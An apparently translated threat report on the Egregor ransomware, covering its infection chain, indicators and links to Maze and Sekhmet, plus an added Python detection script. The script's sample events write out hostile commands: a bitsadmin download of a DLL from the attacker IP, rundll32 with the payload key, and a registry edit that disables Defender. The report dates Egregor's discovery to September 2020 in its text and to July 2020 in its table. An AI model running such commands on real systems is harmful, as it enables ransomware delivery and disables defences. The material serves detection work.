Egregor is a ransomware variant that was first discovered in September 2020. Several sophisticated attacks targeting companies around the world, such as the gaming giants Crytek and Ubisoft, have recently been attributed to it.
Like the double-extortion Maze ransomware, Egregor attacks steal the target's data, store it on a remote server, and then encrypt the data on the victim's machine. Egregor is probably the most aggressive ransomware family in terms of how it negotiates with victims.
The attacker gives the victim only 72 hours to respond. If the ransom is not paid, the data is published on the attacker's website, Egregor News.
Ransom payments are negotiated and agreed through a dedicated chat feature provided for each victim. Ransom payments are made in Bitcoin.
Egregor is believed to be a companion to another ransomware called Sekhmet, which appeared in March 2020. Sekhmet has many similarities with Egregor, and some with Maze.
Egregor is still quite a mystery in terms of how the attacks are delivered and who is behind them, and no detailed information is available at this time. However, since Maze announced its suspension in late October, Egregor is speculated to be its "successor". This assumption is based on the closeness between the two and, of course, the timing of the shift.
Key findings
· New threat: Egregor ransomware has caused great damage in a short period of time and has made news headlines around the world.
· High severity: Cybereason's Nocturnus team rates Egregor's threat level as "high" because of the destructive power of its attacks.
· Slow infiltration: Before deploying the ransomware, the attackers infiltrate the organization and move laterally through it before attempting a full-fledged hacking operation.
· Delivery through commodity malware: Commodity malware appears to be the initial infection vector. Based on preliminary reconnaissance of the data stolen and sent to the C2 server, the attackers escalate into an interactive hacking operation that eventually results in a large number of ransomware infections.
· Detection and defense: The Cybereason Defense Platform fully detects and defends against Egregor ransomware.
Egregor attack flow
From Commodity Malware Infection to Ransomware
Because Egregor is relatively new malware, only a small number of Egregor-related incidents, including details of the infection chain, were available for this report, so a detailed explanation cannot be given yet.
The information obtained so far suggests that the initial infection begins with a phishing email carrying an attachment with malicious macro code embedded in it.
The macro code downloads the Qbot, IcedID, or Ursnif commodity malware. This technique of using commodity malware for the initial infection and ultimately delivering ransomware has previously been observed with Ryuk ransomware and Maze.
Later in the attack, once a Cobalt Strike beacon is installed on the infected machine, the attack transitions into interactive hacking activity. The attackers use reconnaissance tools such as AdFind and SharpHound to gather information about users, groups, computers, and more. This information is also used during the lateral movement stage, allowing the Egregor operators to abuse Active Directory to escalate privileges to domain administrator.
At this stage, once the malware is installed on the victim's machine, it begins communicating with the C2 server and downloads additional components, including scripts, DLLs, and other files used to exfiltrate data and encrypt files.
The downloaded files include the following.
· Batch file: Used to run Bitsadmin and Rundll32 to download and run the Egregor payload.
· Zip file: Contains the RClone client binary (renamed to svchost) and RClone configuration files (webdav, ftp, dropbox) that are used later for data exfiltration.
Cobalt Strike creates a service that executes encrypted PowerShell commands, which in turn run shellcode that connects to amazjai-technologies[.]industry.
After downloading the files needed for the attack, the attacker "prepares" by taking the final steps to evade detection and defense by security products.
A Group Policy Object (GPO) is created to disable Windows Defender, and attempts are made to disable any other antivirus product.
As mentioned earlier, the Egregor attacker deploys the ransomware payload after collecting sensitive information and configuring a GPO to evade detection and protection by security products. To deploy the ransomware, the downloaded batch file is run, and it downloads and executes the ransomware payload from a remote server.
The Egregor payload can only be decrypted if the correct key is supplied in the command-line arguments to the Rundll32 process. The file therefore cannot be analyzed, either manually or in a sandbox, unless exactly the same command line that the attacker used to run the ransomware is provided.
To execute the ransomware and decrypt the code blobs inside it, the attacker's batch file passes the key "-passegregor 10", which the ransomware resolves before running and encrypting files.
The encrypted file name has a random string appended as a new extension. For example, the file name "My_files.zip" is changed to "My_files.zip.IAsnM" and "My_files2.zip" to "My_files2.zip.WZlF". The attacker also drops a ransom note named "recover-files.txt" in every folder that contains encrypted files, as shown below.
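The deployment chain described above (Bitsadmin/Rundll32 stager, GPO disabling Windows Defender, the "-passegregor" key on the Rundll32 command line, and the report's infrastructure indicators) can be turned into simple process-creation detection rules. The following is an added example written for this page, not code from Cybereason or the report; the event format, the regexes, and the sample events are assumptions.

```python
import re

# Indicators quoted in the report, kept defanged here; refang() turns them into the
# form they take in real process-creation logs.
REPORT_INDICATORS = ["185.238.0[.]233", "amazjai-technologies[.]industry"]

def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")

# Detection rules as (name, severity, predicate over one event). The "-passegregor"
# key and the bitsadmin/rundll32 stager come from the report; the regexes are
# assumptions about how they appear on a command line.
RULES = [
    ("egregor_payload_key", "high",
     lambda e: e["image"].lower() == "rundll32.exe"
     and re.search(r"-passegregor\s*\d*", e["cmdline"], re.I) is not None),
    ("bitsadmin_remote_download", "medium",
     lambda e: e["image"].lower() == "bitsadmin.exe"
     and re.search(r"/transfer\b.*https?://", e["cmdline"], re.I) is not None),
    ("known_egregor_infrastructure", "high",
     lambda e: any(refang(i) in e["cmdline"].lower() for i in REPORT_INDICATORS)),
    ("defender_disabled_by_policy", "medium",
     lambda e: "disableantispyware" in e["cmdline"].lower()),
]

def detect(events):
    """Return a (host, rule, severity) tuple for every rule each event trips."""
    hits = []
    for e in events:
        for name, severity, predicate in RULES:
            if predicate(e):
                hits.append((e["host"], name, severity))
    return hits

# Constructed sample events (not taken from the report): host, process image, command line.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer upd /download /priority high http://185.238.0.233/b.dll C:\\Windows\\Temp\\b.dll"},
    {"host": "ws01", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\Temp\\b.dll,DllRegisterServer -passegregor10"},
    {"host": "ws02", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},   # benign, must not alert
    {"host": "dc01", "image": "reg.exe",
     "cmdline": 'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
]

if __name__ == "__main__":
    for host, rule, severity in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule} [{severity}]")
```

The bitsadmin event trips two rules (the stager pattern and the report's IP), which is the kind of overlap worth correlating per host rather than alerting on individually.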
What Sekhmet and Maze have in common
Egregor's code is similar to that of the infamous Maze and Sekhmet ransomware. Beyond the code similarities, the three ransomware families have a lot in common in terms of behavior and features.
| | Maze | Sekhmet | Egregor |
|---|---|---|---|
| First discovery | May 2019 | March 2020 | July 2020 |
| Encrypted file extension | Random-character extension appended to the file name | Random-character extension appended to the file name | Random-character extension appended to the file name |
| Cryptographic algorithm | ChaCha and RSA | ChaCha and RSA | ChaCha and RSA |
| Ransom note file name | DECRYPT-FILES.txt | RECOVER-FILES.txt | RECOVER-FILES.txt |
| Damage caused | Encryption and blackmail | Encryption and blackmail | Encryption and blackmail |
| Contact with the criminals | Tor browser website | Tor browser website | Tor browser website |
| Leak website | Maze News | Leaks, Leaks, Leaks | Egregor News |
Another way to look for commonalities between the three malware families is to look at the infrastructure. Various binaries, Zip files, and scripts were found hosted at the IP address 185.238.0[.]233:
· Maze ransomware binaries
· Egregor ransomware binaries
· Zip file containing the RClone binary and configuration file
The IP address is referenced by various scripts, such as a batch file that downloads the Egregor payload.
Also noteworthy are the similarities between the three ransom notes. They have a very similar structure, with some passages apparently "copy-pasted".
Not only Maze and Egregor binaries were found on this particular server. Other samples related to ProLock ransomware were also found there, as analyzed in this report.